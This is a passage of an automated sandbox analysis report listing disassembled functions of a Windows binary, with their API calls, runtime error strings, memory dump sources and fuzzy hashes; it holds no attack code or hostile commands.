                                                                                                        • Opcode Fuzzy Hash: 125f12cbf819ad59ff386bc5975b7acf701ca1fb5fc1d74b55788fa64a06a3e6
                                                                                                        • Instruction Fuzzy Hash: 87313511B09B8646FB38FB7698902F9A7669F84BD4F848036CD0E477A2DE2CA401C371
                                                                                                        Function 00007FF79E93D990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,00007FF79E927A96), ref: 00007FF79E93D9A6
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00007FF79E927A96), ref: 00007FF79E93D9C0
                                                                                                          • Part of subcall function 00007FF79E951740: QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,00007FF79E93D9B8,?,?,?,?,?,?,00007FF79E927A96), ref: 00007FF79E951765
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PerformanceQuery$CounterErrorFrequencyLast
                                                                                                        • String ID: called `Result::unwrap()` on an `Err` value
                                                                                                        • API String ID: 158728112-2333694755
                                                                                                        • Opcode ID: 5bc127802c3df2079730c422be3828e83479d8627c7c24287756ef6ca370a142
                                                                                                        • Instruction ID: da879145026b788a2c262508e151aff78448e747a81d57f57a95d39a082c9a00
                                                                                                        • Opcode Fuzzy Hash: 5bc127802c3df2079730c422be3828e83479d8627c7c24287756ef6ca370a142
                                                                                                        • Instruction Fuzzy Hash: 2D11A522A0994659EB24BB70D8D23FD6724EF84354FC44032DD4D42BA6DE2CE551C371
                                                                                                        Function 00007FF79E947C60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • assertion failed: socket != sys::c::INVALID_SOCKET as RawSocketlibrary\std\src\os\windows\io\socket.rs, xrefs: 00007FF79E947C87
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Socketmemsetrecv
                                                                                                        • String ID: assertion failed: socket != sys::c::INVALID_SOCKET as RawSocketlibrary\std\src\os\windows\io\socket.rs
                                                                                                        • API String ID: 1952720251-42570012
                                                                                                        • Opcode ID: 18c7bb4dfbb0b872742dc44238251bf92bb93ec967aacfa1f0eec4458d7dcfab
                                                                                                        • Instruction ID: 4d60fdb9f24ffd1be938116832046e2b8ac2d2e88e67d4e6c5770a02f12025a4
                                                                                                        • Opcode Fuzzy Hash: 18c7bb4dfbb0b872742dc44238251bf92bb93ec967aacfa1f0eec4458d7dcfab
                                                                                                        • Instruction Fuzzy Hash: E101F122B18A8A89FB34B374D4C56B893569B84334FA84331D93C467E0EE2C96828231
                                                                                                        Function 00007FF79E99D690 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: fprintf
                                                                                                        • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                        • API String ID: 383729395-3474627141
                                                                                                        • Opcode ID: 325970b99f59e992869b15b547b78a0270b7646e7ed450ca3ae991192f7a869d
                                                                                                        • Instruction ID: c39910e3fef7cf8b624c02b171c7a3ea03c9ed281bdcf74284a7d94b1826e21e
                                                                                                        • Opcode Fuzzy Hash: 325970b99f59e992869b15b547b78a0270b7646e7ed450ca3ae991192f7a869d
                                                                                                        • Instruction Fuzzy Hash: 6A01E563D0CF8482D6119F2CD8801BAB334FB5E798F659325EB8C26125DF29E582C720
                                                                                                        Function 00007FF79E99D740 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: fprintf
                                                                                                        • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                        • API String ID: 383729395-4283191376
                                                                                                        • Opcode ID: c2ec67f7798fbaf6a926c8f2ca5cc0b96a5e3d9249152667c1d4eac8be866468
                                                                                                        • Instruction ID: e754d70918f3c2a72e5b4c4979e9c78ae971cb7282035a4512ad676cb97f7009
                                                                                                        • Opcode Fuzzy Hash: c2ec67f7798fbaf6a926c8f2ca5cc0b96a5e3d9249152667c1d4eac8be866468
                                                                                                        • Instruction Fuzzy Hash: C5F09652C0CE8482D6129F2CA4401BBB374FF9E798F695325EF8D26565EF29E5828720
                                                                                                        Function 00007FF79E99D750 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: fprintf
                                                                                                        • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                        • API String ID: 383729395-4064033741
                                                                                                        • Opcode ID: 3cb0424a8953d48a008c56219b0bef7cf853752c9e33e66b8e5c155e833ea758
                                                                                                        • Instruction ID: 2c701116c36665d7f8314b1cd193472606518eec211a548a1bcf22fcc0895b8b
                                                                                                        • Opcode Fuzzy Hash: 3cb0424a8953d48a008c56219b0bef7cf853752c9e33e66b8e5c155e833ea758
                                                                                                        • Instruction Fuzzy Hash: AFF09C52C0CE4482D612DF2CA4401BBB374FF8D798F685325EF8D26565DF29E5828724
                                                                                                        Function 00007FF79E99D730 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: fprintf
                                                                                                        • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                        • API String ID: 383729395-2713391170
                                                                                                        • Opcode ID: 6eb4b77c4f8eaeccad83fc189a02852e575d745d1ffcaaaa937404e0f1d88fc3
                                                                                                        • Instruction ID: fe47c726490ebffe64ee59375533e196b40f7ec61708b09c1d441a8d1ca027f5
                                                                                                        • Opcode Fuzzy Hash: 6eb4b77c4f8eaeccad83fc189a02852e575d745d1ffcaaaa937404e0f1d88fc3
                                                                                                        • Instruction Fuzzy Hash: 74F09652C0CE8482D6129F2CA4401BBB374FF8E798F685325EF8D36565EF29E5828720
                                                                                                        Function 00007FF79E99D760 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: fprintf
                                                                                                        • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                        • API String ID: 383729395-2187435201
                                                                                                        • Opcode ID: 74f6f8cb7482b7fac668cf4040dadbe3c3bfaaa47e60ece2ce6dc68220263ba8
                                                                                                        • Instruction ID: 5b46c8f5448215ccebd0993d8b52097fc5714d8c850538aabef248e3d6a8d1c0
                                                                                                        • Opcode Fuzzy Hash: 74f6f8cb7482b7fac668cf4040dadbe3c3bfaaa47e60ece2ce6dc68220263ba8
                                                                                                        • Instruction Fuzzy Hash: 4AF09C52C0CE4482D6129F2CA4401BBB374FF4D798F685325EF8D26565DF29E5828720
                                                                                                        Function 00007FF79E99D770 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: fprintf
                                                                                                        • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                        • API String ID: 383729395-4273532761
                                                                                                        • Opcode ID: 03791ac738d86c5becd05f1d06faabf352435464b988844d8f4eb4cb428f2bb6
                                                                                                        • Instruction ID: 6c4f8b6fb9acf43649fac6c3d5b0c02832bf5750e50842c735f1e2017fb516d3
                                                                                                        • Opcode Fuzzy Hash: 03791ac738d86c5becd05f1d06faabf352435464b988844d8f4eb4cb428f2bb6
                                                                                                        • Instruction Fuzzy Hash: 65F09652C0CF8486D6129F2CA4401BBB374FF8E798F695325EF8D26525EF29E5828720
                                                                                                        Function 00007FF79E99D6C8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: fprintf
                                                                                                        • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                        • API String ID: 383729395-2468659920
                                                                                                        • Opcode ID: 044f746fec8141a5650da142353fa8f6c9191853f4d67955629525536e3646b3
                                                                                                        • Instruction ID: 7e7c9182834c164af835d40f5f87db3bf35fc6a3e826c8eecf04f8f0300470eb
                                                                                                        • Opcode Fuzzy Hash: 044f746fec8141a5650da142353fa8f6c9191853f4d67955629525536e3646b3
                                                                                                        • Instruction Fuzzy Hash: 44F09652C08E8482D6129F2CA4401BBB374FF4E798F685325EF8D2A525EF28E5828720
                                                                                                        Function 00007FF79E9A70E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 16COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _assert
                                                                                                        • String ID: d->m_pPut_buf_func$miniz.c
                                                                                                        • API String ID: 1222420520-1422148667
                                                                                                        • Opcode ID: c5ca33d8b2d9640e21d71f0d63a30bd7cfcdb7858e4995671dc4119af1b28226
                                                                                                        • Instruction ID: 83e98cca2cb535d2ed6ff374d72350ae5c38edbdef5864043177712484e1511b
                                                                                                        • Opcode Fuzzy Hash: c5ca33d8b2d9640e21d71f0d63a30bd7cfcdb7858e4995671dc4119af1b28226
                                                                                                        • Instruction Fuzzy Hash: 30E01A32E0DA82C1EB30EB60F895B65A7A0FB64358FC04132E58C46A64EF7CD655CB60
                                                                                                        Function 00007FF79E95C030 Relevance: 5.1, APIs: 4, Instructions: 75COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value
                                                                                                        • String ID:
                                                                                                        • API String ID: 3702945584-0
                                                                                                        • Opcode ID: 1ddc5afa2437382de4da30d14379927b5c5762f07e08f54a2fa18bdb4944adac
                                                                                                        • Instruction ID: f7398fb288477a7fde196b497360f3efa4097464a4d5adeb79ab855182e602e5
                                                                                                        • Opcode Fuzzy Hash: 1ddc5afa2437382de4da30d14379927b5c5762f07e08f54a2fa18bdb4944adac
                                                                                                        • Instruction Fuzzy Hash: AC21DE91F0969246FE757B354990379DB81AF44BA0F888030DE4D577C6EE3DE8828372
                                                                                                        Function 00007FF79E903D0F Relevance: 5.0, APIs: 4, Instructions: 42COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset$memcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 368790112-0
                                                                                                        • Opcode ID: 3a4eb231362921433dc93685f34cfa11d0ceaa83893d8fe4e9e3e3f5a0c8f505
                                                                                                        • Instruction ID: 2375ac6d60f9100e18fe50378d525b27486f60ac81efc506904d1e4031b8b56e
                                                                                                        • Opcode Fuzzy Hash: 3a4eb231362921433dc93685f34cfa11d0ceaa83893d8fe4e9e3e3f5a0c8f505
                                                                                                        • Instruction Fuzzy Hash: 71012602B1438106F328E232E1817EBA702AB97394F858130DB89077C3DB6DF2858723
                                                                                                        Function 00007FF79E907DD0 Relevance: 5.0, APIs: 4, Instructions: 33COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 2962429428-0
                                                                                                        • Opcode ID: 08cfd3454bba051318f188c582b51514c55f897753e3b98a6b1a50b70a3e0283
                                                                                                        • Instruction ID: e9a0f1521bbc0a0e7b78b14c61c2c6fa83bf40137f2ad7e3dcccddf78f40791c
                                                                                                        • Opcode Fuzzy Hash: 08cfd3454bba051318f188c582b51514c55f897753e3b98a6b1a50b70a3e0283
                                                                                                        • Instruction Fuzzy Hash: F1F04422A0884192E635F626E4853B997A4EB447A4F885831DB4D425E5DF2CE8C2C332
                                                                                                        Function 00007FF79E937E30 Relevance: 5.0, APIs: 4, Instructions: 30COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1530271758.00007FF79E8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79E8F0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1529985707.00007FF79E8F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530737716.00007FF79E9AB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1530838950.00007FF79E9AC000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531653645.00007FF79EACB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531743540.00007FF79EACC000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1531807395.00007FF79EACF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ff79e8f0000_ajbs50ul.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 2962429428-0
                                                                                                        • Opcode ID: 31edc7ff308469dddd6adb955d7f78b14f4124b3d254acd579d97fb2cec79fea
                                                                                                        • Instruction ID: fb203639b1d99bba045e5eb9271be1b51b3992dcea6f6bd5346543c3d5cf3601
                                                                                                        • Opcode Fuzzy Hash: 31edc7ff308469dddd6adb955d7f78b14f4124b3d254acd579d97fb2cec79fea
                                                                                                        • Instruction Fuzzy Hash: 48F03622A0494595E635FE36D8857B857A4EB44FACF581531DE0C46695DF38DCC2C332